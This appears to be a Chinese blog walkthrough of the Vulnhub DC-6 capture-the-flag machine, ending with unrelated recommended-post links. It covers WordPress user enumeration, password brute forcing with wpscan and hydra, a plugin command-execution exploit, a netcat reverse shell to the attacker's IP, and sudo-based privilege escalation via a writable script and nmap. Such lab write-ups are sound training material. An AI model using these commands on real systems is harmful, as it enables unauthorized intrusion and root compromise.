Vulnhub靶机:DC6

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC6(10.0.2.59)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.59

使用nmap端口扫描发现靶机开放端口:22、80

复制代码
nmap -A 10.0.2.59 -p 1-65535

打开网站发现会自动跳转到域名wordy,在/etc/hosts文件添加一条数据并保存:

复制代码
10.0.2.59      wordy

再次访问网站,成功访问,该网站是wordpress框架搭建的

使用gobuster和dirsearch工具爆破目录

复制代码
gobuster dir -u http://wordy/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://wordy/                     


三、漏洞利用

使用wpscan工具扫描一下,枚举用户名,发现五个用户名:admin、graham、mark、sarah、jens

复制代码
wpscan --url http://wordy/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

可以尝试使用wpscan工具对网站进行暴力破解和使用hydra工具对ssh进行暴力破解:

复制代码
wpscan --url http://wordy/  -P /usr/share/wordlists/rockyou.txt -U user1.txt

hydra -L user1.txt -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.59:22 -t 64 


爆破了很久,wpscan爆破得到:mark:helpdesk01

登录网站,发现网站使用插件:activity monitor

使用searchsploit搜索该插件的历史漏洞,发现命令执行漏洞

复制代码
searchsploit wordpress activity monitor

将命令执行漏洞的exp下载下来,运行

使用nc命令反弹shell

复制代码
nc -e /bin/bash 10.0.2.15 4444

获取交互式shell

复制代码
python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

运行命令sudo -l查看一下具有sudo权限的程序,需要输入密码;运行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,未发现可利用的。

翻一翻靶机各个文件发现文件/home/mark/stuff/things-to-do.txt/home/jens/backups.sh

查看这两个文件发现一组用户名密码:graham:GSo7isUM1D4


切换为graham用户

运行命令sudo -l查看一下具有sudo权限的程序,发现可以无密码以jens用户权限运行/home/jens/backups.sh文件

查看backups.sh文件发现我们具有修改权限

将提权命令写入backups.sh文件

复制代码
echo '/bin/bash' >> backups.sh

以jens用户权限运行backups.sh文件

复制代码
sudo -u jens /home/jens/backups.sh

运行命令sudo -l查看一下具有sudo权限的程序,发现可以以root权限无密码运行nmap命令

使用nmap命令进行提权

复制代码
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

获取flag

相关推荐
筑梦之月16 小时前
3分钟解决ZAP打开浏览器闪退问题
web安全
m0_7381207216 小时前
CTFshow系列——PHP特性Web93-96
开发语言·安全·web安全·php·ctfshow
Suckerbin20 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
黄焖鸡能干四碗1 天前
信息系统安全保护措施文件方案
大数据·开发语言·人工智能·web安全·制造
2301_780789661 天前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
卓码软件测评1 天前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
似水流年 光阴已逝2 天前
《网络安全实战:CC攻击(应用层)与DDoS攻击(网络层)的底层逻辑与防御体系》
安全·web安全·ddos·网络攻击·安全防护·cc攻击
网络安全大学堂2 天前
【网络安全入门基础教程】网络安全零基础学习方向及需要掌握的技能
网络·学习·安全·web安全·网络安全·黑客
码农101号2 天前
Linux 网络安全运维与文件权限控制和日志操作
运维·web安全·云计算
安畅检测_齐鲁物联网测试中心2 天前
信息化安全性测试中漏洞扫描的定义与核心目的
安全·web安全·漏洞扫描·cma·cnas·第三方检测机构·信息安全性测试